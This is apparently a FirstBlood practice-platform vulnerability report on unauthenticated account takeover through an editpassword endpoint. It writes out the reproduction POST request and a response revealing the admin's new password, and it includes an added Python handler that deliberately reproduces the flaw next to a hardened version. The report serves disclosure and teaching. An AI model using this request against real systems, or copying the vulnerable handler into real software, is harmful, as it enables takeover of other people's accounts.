FirstBlood-#519 Account takeover via /drpanel/drapi/editpassword.php
This issue was discovered on FirstBlood v2.0.0 (issues patched)

On 2021-10-26, 0x1452 (Level 3) reported:



The HTML source of /drpanel/index.php contains the following code in a comment:

 function editpassword(username) {
     var xhr = new XMLHttpRequest();
     xhr.open("POST", '', true); // the URL was left blank in the leaked comment
     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

     xhr.onreadystatechange = function() {
         if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
             // success branch was empty in the comment
         } else {
             // error branch was cut off in the comment
         }
     };
     // body format as described in the report: username=<target username>
     xhr.send("username=" + encodeURIComponent(username));
 }


I found that there's an endpoint called /drpanel/drapi/editpassword.php that lets you reset anyone's password. The user doesn't have to be logged in at all to do this.

To reproduce this, simply send a POST request to /drpanel/drapi/editpassword.php with the body username=:username.

Taking over the admin account:

Note that there are no session cookies set!

POST /drpanel/drapi/editpassword.php HTTP/1.1
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15


Example response:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Oct 2021 02:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34

Password updated - RxJPi2qpNyjYQnc

The attacker can now log into the admin account drAdmin using the new password.


An attacker can take over any account they know the username of.


Endpoint: /drpanel/drapi/editpassword.php

This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Auth issues

FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admin's password (dradmin) from /drapi/editpassword, as the endpoint only checks the supplied username. Usernames can be enumerated at login, since trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.

FirstBlood ID: 28
Vulnerability Type: Auth issues

The endpoint /drapi/editpassword can actually be accessed unauthenticated.
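The two findings above come down to one missing authorization step: the handler trusted the username field and nothing else. The following is an added illustration, not code from FirstBlood or from the reporter, that places a handler mirroring the reported behaviour next to a hardened version; the in-memory USERS store, the drStaff account and the function names are assumptions made for the example.

```python
import hashlib
import secrets

def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_user(password: str, role: str) -> dict:
    salt = secrets.token_bytes(16)
    return {"role": role, "salt": salt, "hash": _hash(password, salt)}

# Constructed in-memory user store (an assumption, not FirstBlood's real schema).
USERS = {"drAdmin": make_user("old-admin-pw", "admin"),
         "drStaff": make_user("old-staff-pw", "staff")}

def verify(username: str, password: str) -> bool:
    u = USERS.get(username)
    return u is not None and secrets.compare_digest(u["hash"], _hash(password, u["salt"]))

def _set_password(username: str, new_pw: str) -> None:
    salt = secrets.token_bytes(16)
    USERS[username]["salt"] = salt
    USERS[username]["hash"] = _hash(new_pw, salt)

def editpassword_vulnerable(form: dict) -> str:
    # Mirrors the reported behaviour: the username is the only input consulted,
    # so any unauthenticated caller can reset any known account.
    username = form.get("username", "")
    if username not in USERS:
        return "404 Not Found"
    new_pw = secrets.token_urlsafe(12)
    _set_password(username, new_pw)
    return "Password updated - " + new_pw

def editpassword_hardened(session, form: dict) -> str:
    # 1. Refuse anything that does not carry an authenticated session.
    if not session or "user" not in session:
        return "401 Unauthorized"
    actor = session["user"]
    target = form.get("username", actor)
    # 2. Only the account owner or an admin may touch the target account; answer
    #    uniformly so the response does not reveal whether a username exists.
    if target not in USERS or (actor != target and USERS[actor]["role"] != "admin"):
        return "403 Forbidden"
    # 3. A self-service change must prove knowledge of the current password.
    if actor == target and not verify(actor, form.get("current_password", "")):
        return "403 Forbidden"
    _set_password(target, form.get("new_password") or secrets.token_urlsafe(12))
    return "Password updated"
```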